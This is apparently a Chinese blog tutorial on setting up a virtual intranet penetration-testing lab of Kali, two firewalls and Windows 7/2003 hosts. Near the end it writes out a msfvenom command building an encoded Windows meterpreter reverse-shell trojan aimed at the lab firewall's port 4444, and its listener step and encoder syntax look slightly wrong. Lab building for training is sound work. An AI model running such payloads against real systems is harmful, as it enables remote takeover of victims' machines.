内网渗透系列之真实内网环境搭建

真实内网环境搭建

前言

最近学习了内网的一些知识，学会了域的创建，域渗透以及内网渗透方面的知识，这里就简单给大家介绍一下真实内网环境的搭建过程。

靶机的准备

这里需要5台机器，分别是kali+2台防火墙+2台服务器(内网机器)其中防火墙可以去网上下载。或者可以去我的资源那里下载。其中的话，就需要3张网卡了，VM1，VM2，VM8，其中VM1和VM2是仅主机模式，VM8是NAT模式。
靶机的网卡设置如下：
网卡设置：
kali（VM1）192.168.101.102

防火墙1
外网：192.168.231.131
内网：192.168.101.1

防火墙2
外网：192.168.231.132
内网：192.168.102.1

win7（VM2）：
192.168.102.102

win03（VM2）：
192.168.102.103

接下来，我们打开所有的靶机，进行配置环境
在网络编辑器里，进行编译网卡信息。

现在我创建好了VM2的虚拟机，其中的VM1和VM2不用勾选DHCP，让他自动获取ip

接下来，就是配置防火墙的一些配置信息了，让主机可以访问到防火墙的内网和外网的ip我们打开防火墙1，进行配置信息，这里由于在虚拟机中配置了防火墙，对网络起到一定的中断作用，所以主机一直上不了网，我只能用手机拍一些图片给大家配置一下。这里的防火墙2就直接克隆一份就行了。

这是防火墙打开时的初始化配置，我们需要配置le0,le1网卡，分别是内网和外网的网卡。我们还要配置ip地址。

我们就相当于配置好了防火墙1的ip地址，接下来我们配置防火墙2的地址。


当我们的ip没有得到更新的时候，我们可以刷新一下网卡，在cmd上输入ipconfig /release，然后在输入ipconfig /renew。


我们访问防火墙的外网ip，修改一些规则信息，将WAN一些禁止网络流量通过的选项去取勾选，选为任意流量都可以通过。


将其中的TCP修改为any

保存，退出页面

一定要点击Apply changes才会生效



我们添加外网的4444端口开放，使得win7可以访问kali的4444端口，也就是防火墙的外网ip：192.168.231.131:4444



我们在win7进行访问kali的4444端口
192.168.231.131:4444

我们先用msf生成一个木马程序，将他放入win7中执行，命令如下：
木马的生成

msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.231.131 lport=4444 -a x86 --platform windows -b “\x00\xff” -e x86 /shikata_ga_nai -f exe > msf.exe
（其中的-p是payload的木马，-a是平台架构，-b是避开字符，-e是字符编码）

我们打开kali的4444端口进行监听

python -m SimpleHTTPServer 4444

我们打开msf，进行反弹shell

这里的木马程序如何放入，就需要开始时外网渗透获取的getshell后，进行上传程序，然后在终端执行即可。

后记

好了，真实的内网环境就搭建好了，由于篇幅较长，就不介绍接下来的攻击流程了，下一篇文章，我们重点讲一下，Pivoting跳板攻击与自动路由的配置流程，用于访问内网的页面至关重要，大家好好复习一下吧。